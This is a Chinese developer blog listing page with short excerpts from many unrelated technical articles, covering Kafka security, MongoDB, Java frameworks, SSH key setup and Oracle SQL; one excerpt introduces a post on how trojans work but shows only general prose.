    Kafka作为一个高性能、可扩展的分布式流处理平台,通过多种机制来确保数据的安全性、可靠性和分区的有效管理。以下是关于Kafka如何保证数据安全性、可靠性和分区的详细解析:一、数据安全性SSL/TLS加密:Kafka支持SSL/TLS协议,通过配置SSL证书和密钥来加密数据传输,确保数据在传输过程中不会被窃取或篡改。这一机制有效防止了中间人攻击,保护了数据的安全性。SASL认证:Kafka支持多种
  • Java爬虫框架(一)--架构设计 狼图腾-狼之传说 java框架java任务html解析器存储电子商务
    一、架构图那里搜网络爬虫框架主要针对电子商务网站进行数据爬取,分析,存储,索引。爬虫:爬虫负责爬取,解析,处理电子商务网站的网页的内容数据库:存储商品信息索引:商品的全文搜索索引Task队列:需要爬取的网页列表Visited表:已经爬取过的网页列表爬虫监控平台:web平台可以启动,停止爬虫,管理爬虫,task队列,visited表。二、爬虫1.流程1)Scheduler启动爬虫器,TaskMast
  • 2022-10-10 幸福芳芳
    10.10日觉察日记1.事件:开晨会员工来不齐,路远的请假,离得近的也请假,一律不批!2.感受:生气,气愤(情绪如何转化或使用)3.想法:1.今年已经很少开晨会了,非必要不会通知开会的,临近点了再打电话请假,又不是特别忙的季节,借口都会找~~2.不来的按公司标准执行负激励,待岗处理!我为你们负责,你们安全重要会议都不参加,自己都不为自己负责!以后有事也别找我!尤其是经销商老板,自己都不清楚自己用工
  • MongoDB知识概括 GeorgeLin98 持久层mongodb
    MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景:传统的关系型数据库(如MySQL),在数据操作的“三高”需求以及应对Web2.0的网站需求面前,显得力不从心。解释:“三高”需求:①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • Mongodb Error: queryTxt ETIMEOUT xxxx.wwwdz.mongodb.net 佛一脚 errorreactmongodb数据库
    背景每天都能遇到奇怪的问题,做个记录,以便有缘人能得到帮助!换了一台电脑开发nextjs程序。需要连接mongodb数据,对数据进行增删改查。上一台电脑好好的程序,新电脑死活连不上mongodb数据库。同一套代码,没任何修改,搞得我怀疑人生了,打开浏览器进入mongodb官网毫无问题,也能进入线上系统查看数据,网络应该是没问题。于是我尝试了一下手机热点,这次代码能正常跑起来,连接数据库了!!!是不
  • 基于STM32的汽车仪表显示系统:集成CAN、UART与I2C总线设计流程 极客小张 stm32汽车嵌入式硬件物联网单片机c语言
    一、项目概述项目目标与用途本项目旨在设计和实现一个基于STM32微控制器的汽车仪表显示系统。该系统能够实时显示汽车的速度、转速、油量等关键信息,并通过CAN总线与其他汽车控制单元进行通信。这种仪表显示系统不仅提高了驾驶的安全性和便捷性,还能为汽车提供更智能的用户体验。技术栈关键词微控制器:STM32显示技术:TFTLCD/OLED传感器:速度传感器、温度传感器、油量传感器通信协议:CAN总线、UA
  • java类加载顺序 3213213333332132 java
    package com.demo; /** * @Description 类加载顺序 * @author FuJianyong * 2015-2-6上午11:21:37 */ public class ClassLoaderSequence { String s1 = "成员属性"; static String s2 = "
  • Hibernate与mybitas的比较 BlueSkator sqlHibernate框架ibatisorm
    第一章     Hibernate与MyBatis Hibernate 是当前最流行的O/R mapping框架,它出身于sf.net,现在已经成为Jboss的一部分。 Mybatis 是另外一种优秀的O/R mapping框架。目前属于apache的一个子项目。 MyBatis 参考资料官网:http:
  • php多维数组排序以及实际工作中的应用 dcj3sjt126com PHPusortuasort
    自定义排序函数返回false或负数意味着第一个参数应该排在第二个参数的前面, 正数或true反之, 0相等usort不保存键名uasort 键名会保存下来uksort 排序是对键名进行的 <!doctype html> <html lang="en"> <head> <meta charset="utf-8&q
  • DOM改变字体大小 周华华 前端
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • c3p0的配置 g21121 c3p0
    c3p0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。c3p0的下载地址是:http://sourceforge.net/projects/c3p0/这里可以下载到c3p0最新版本。 以在spring中配置dataSource为例: <!-- spring加载资源文件 --> <bean name="prope
  • Java获取工程路径的几种方法 510888780 java
    第一种: File f = new File(this.getClass().getResource("/").getPath()); System.out.println(f); 结果: C:\Documents%20and%20Settings\Administrator\workspace\projectName\bin 获取当前类的所在工程路径; 如果不加“
  • 在类Unix系统下实现SSH免密码登录服务器 Harry642 免密ssh
    1.客户机     (1)执行ssh-keygen -t rsa -C "[email protected]"生成公钥,xxx为自定义大email地址     (2)执行scp ~/.ssh/id_rsa.pub root@xxxxxxxxx:/tmp将公钥拷贝到服务器上,xxx为服务器地址     (3)执行cat
  • Java新手入门的30个基本概念一 aijuans javajava 入门新手
    在我们学习Java的过程中,掌握其中的基本概念对我们的学习无论是J2SE,J2EE,J2ME都是很重要的,J2SE是Java的基础,所以有必要对其中的基本概念做以归纳,以便大家在以后的学习过程中更好的理解java的精髓,在此我总结了30条基本的概念。  Java概述:  目前Java主要应用于中间件的开发(middleware)---处理客户机于服务器之间的通信技术,早期的实践证明,Java不适合
  • Memcached for windows 简单介绍 antlove javaWebwindowscachememcached
    1. 安装memcached server a. 下载memcached-1.2.6-win32-bin.zip b. 解压缩,dos 窗口切换到 memcached.exe所在目录,运行memcached.exe -d install c.启动memcached Server,直接在dos窗口键入 net start "memcached Server&quo
  • 数据库对象的视图和索引 百合不是茶 索引oeacle数据库视图
      视图     视图是从一个表或视图导出的表,也可以是从多个表或视图导出的表。视图是一个虚表,数据库不对视图所对应的数据进行实际存储,只存储视图的定义,对视图的数据进行操作时,只能将字段定义为视图,不能将具体的数据定义为视图       为什么oracle需要视图;    &
  • Mockito(一) --入门篇 bijian1013 持续集成mockito单元测试
            Mockito是一个针对Java的mocking框架,它与EasyMock和jMock很相似,但是通过在执行后校验什么已经被调用,它消除了对期望 行为(expectations)的需要。其它的mocking库需要你在执行前记录期望行为(expectations),而这导致了丑陋的初始化代码。  &nb
  • 精通Oracle10编程SQL(5)SQL函数 bijian1013 oracle数据库plsql
    /* * SQL函数 */ --数字函数 --ABS(n):返回数字n的绝对值 declare v_abs number(6,2); begin v_abs:=abs(&no); dbms_output.put_line('绝对值:'||v_abs); end; --ACOS(n):返回数字n的反余弦值,输入值的范围是-1~1,输出值的单位为弧度
  • 【Log4j一】Log4j总体介绍 bit1129 log4j
    Log4j组件:Logger、Appender、Layout   Log4j核心包含三个组件:logger、appender和layout。这三个组件协作提供日志功能: 日志的输出目标 日志的输出格式 日志的输出级别(是否抑制日志的输出)  logger继承特性 A logger is said to be an ancestor of anothe
  • Java IO笔记 白糖_ java
    public static void main(String[] args) throws IOException { //输入流 InputStream in = Test.class.getResourceAsStream("/test"); InputStreamReader isr = new InputStreamReader(in); Bu
  • Docker 监控 ronin47 docker监控
             目前项目内部署了docker,于是涉及到关于监控的事情,参考一些经典实例以及一些自己的想法,总结一下思路。 1、关于监控的内容 监控宿主机本身 监控宿主机本身还是比较简单的,同其他服务器监控类似,对cpu、network、io、disk等做通用的检查,这里不再细说。 额外的,因为是docker的
  • java-顺时针打印图形 bylijinnan java
    一个画图程序 要求打印出: 1.int i=5; 2.1 2 3 4 5 3.16 17 18 19 6 4.15 24 25 20 7 5.14 23 22 21 8 6.13 12 11 10 9 7. 8.int i=6 9.1 2 3 4 5 6 10.20 21 22 23 24 7 11.19
  • 关于iReport汉化版强制使用英文的配置方法 Kai_Ge iReport汉化英文版
    对于那些具有强迫症的工程师来说,软件汉化固然好用,但是汉化不完整却极为头疼,本方法针对iReport汉化不完整的情况,强制使用英文版,方法如下: 在 iReport 安装路径下的 etc/ireport.conf 里增加红色部分启动参数,即可变为英文版。   # ${HOME} will be replaced by user home directory accordin
  • [并行计算]论宇宙的可计算性 comsci 并行计算
          现在我们知道,一个涡旋系统具有并行计算能力.按照自然运动理论,这个系统也同时具有存储能力,同时具备计算和存储能力的系统,在某种条件下一般都会产生意识......       那么,这种概念让我们推论出一个结论     &nb
  • 用OpenGL实现无限循环的coverflow dai_lm androidcoverflow
    网上找了很久,都是用Gallery实现的,效果不是很满意,结果发现这个用OpenGL实现的,稍微修改了一下源码,实现了无限循环功能 源码地址: https://github.com/jackfengji/glcoverflow public class CoverFlowOpenGL extends GLSurfaceView implements GLSurfaceV
  • JAVA数据计算的几个解决方案1 datamachine javaHibernate计算
    老大丢过来的软件跑了10天,摸到点门道,正好跟以前攒的私房有关联,整理存档。 -----------------------------华丽的分割线-------------------------------------     数据计算层是指介于数据存储和应用程序之间,负责计算数据存储层的数据,并将计算结果返回应用程序的层次。J  &nbs
  • 简单的用户授权系统,利用给user表添加一个字段标识管理员的方式 dcj3sjt126com yii
    怎么创建一个简单的(非 RBAC)用户授权系统 通过查看论坛,我发现这是一个常见的问题,所以我决定写这篇文章。 本文只包括授权系统.假设你已经知道怎么创建身份验证系统(登录)。 数据库 首先在 user 表创建一个新的字段(integer 类型),字段名 'accessLevel',它定义了用户的访问权限 扩展 CWebUser 类 在配置文件(一般为 protecte
  • 未选之路 dcj3sjt126com
    作者:罗伯特*费罗斯特   黄色的树林里分出两条路, 可惜我不能同时去涉足, 我在那路口久久伫立, 我向着一条路极目望去, 直到它消失在丛林深处.   但我却选了另外一条路, 它荒草萋萋,十分幽寂; 显得更诱人,更美丽, 虽然在这两条小路上, 都很少留下旅人的足迹.   那天清晨落叶满地, 两条路都未见脚印痕迹. 呵,留下一条路等改日再
  • Java处理15位身份证变18位 蕃薯耀 18位身份证变15位15位身份证变18位身份证转换
      15位身份证变18位,18位身份证变15位 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--应用上下文配置【AppConfig】 hanqunfeng springmvc4
    从spring3.0开始,Spring将JavaConfig整合到核心模块,普通的POJO只需要标注@Configuration注解,就可以成为spring配置类,并通过在方法上标注@Bean注解的方式注入bean。   Xml配置和Java类配置对比如下: applicationContext-AppConfig.xml   <!-- 激活自动代理功能 参看:
  • Android中webview跟JAVASCRIPT中的交互 jackyrong JavaScripthtmlandroid脚本
      在android的应用程序中,可以直接调用webview中的javascript代码,而webview中的javascript代码,也可以去调用ANDROID应用程序(也就是JAVA部分的代码).下面举例说明之: 1 JAVASCRIPT脚本调用android程序    要在webview中,调用addJavascriptInterface(OBJ,int
  • 8个最佳Web开发资源推荐 lampcy 编程Web程序员
    Web开发对程序员来说是一项较为复杂的工作,程序员需要快速地满足用户需求。如今很多的在线资源可以给程序员提供帮助,比如指导手册、在线课程和一些参考资料,而且这些资源基本都是免费和适合初学者的。无论你是需要选择一门新的编程语言,或是了解最新的标准,还是需要从其他地方找到一些灵感,我们这里为你整理了一些很好的Web开发资源,帮助你更成功地进行Web开发。 这里列出10个最佳Web开发资源,它们都是受
  • 架构师之面试------jdk的hashMap实现 nannan408 HashMap
    1.前言。   如题。 2.详述。   (1)hashMap算法就是数组链表。数组存放的元素是键值对。jdk通过移位算法(其实也就是简单的加乘算法),如下代码来生成数组下标(生成后indexFor一下就成下标了)。 static int hash(int h) { h ^= (h >>> 20) ^ (h >>>
  • html禁止清除input文本输入缓存 Rainbow702 html缓存input输入框change
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。 如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off";  <input type="text" autocomplete="off" n
  • POJO和JavaBean的区别和联系 tjmljw POJOjava beans
    POJO 和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Pure Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比 POJO复杂很多, Java Bean 是可复用的组件,对 Java Bean 并没有严格的规
  • java中单例的五种写法 liuxiaoling java单例
    /** * 单例模式的五种写法: * 1、懒汉 * 2、恶汉 * 3、静态内部类 * 4、枚举 * 5、双重校验锁 */ /** * 五、 双重校验锁,在当前的内存模型中无效 */ class LockSingleton { private volatile static LockSingleton singleton; pri
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他